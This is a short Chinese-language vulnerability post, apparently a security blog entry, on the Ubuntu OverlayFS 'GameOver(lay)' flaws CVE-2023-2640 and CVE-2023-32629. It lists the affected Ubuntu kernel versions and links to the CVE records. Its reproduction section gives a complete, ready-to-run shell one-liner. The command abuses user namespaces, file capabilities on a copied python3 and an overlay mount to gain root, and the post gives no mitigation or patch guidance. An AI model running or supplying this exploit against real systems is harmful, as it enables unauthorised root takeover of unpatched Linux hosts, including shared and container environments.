0x00 前言
Ubuntu是一种基于Linux操作系统的自由软件,它以用户友好的界面和易用性而著称。
0x01 漏洞描述
Ubuntu OverlayFS 模块中已发现两个权限提升漏洞,漏洞源于 Ubuntu 对容器环境中广泛使用的 OverlayFS 模块的实现差异。
(OverlayFS 是一种联合装载文件系统实现,因其允许通过用户名称空间进行无特权访问,并且受到容易被利用的漏洞的干扰,过去曾多次受到威胁攻击者的攻击)
CVE-2023-2640 涉及某些 Ubuntu 内核,这些内核允许非特权用户在未进行适当安全检查的情况下在已安装文件上设置特权扩展属性。
第二个缺陷 CVE-2023-32629 是一个本地权限提升漏洞,在 Ubuntu 内核上执行某些操作时会跳过权限检查。
从本质上讲,GameOver(lay) 漏洞能够制作具有作用域文件功能的可执行文件,欺骗 Ubuntu 内核将其复制到具有非作用域功能的不同位置。这授予任何执行它的人类似 root 的权限。
0x02 CVE编号
CVE-2023-2640
CVE-2023-32629
0x03 影响版本
Ubuntu 23.04 (Lunar Lobster) Version 6.2.0
Ubuntu 22.10 (Kinetic Kudu) Version 5.19.0
Ubuntu 22.04 LTS (Jammy Jellyfish) Versions 5.19.0 and 6.2.0
Ubuntu 20.04 LTS (Focal Fossa) Version 5.4.0 (Only affected by CVE-2023-32629)
Ubuntu 18.04 LTS (Bionic Beaver) Version 5.4.0 (Only affected by CVE-2023-32629)
Ubuntu 16.04 ESM
Ubuntu 14.04 ESM
0x04 漏洞复现
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
0x05 参考链接
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640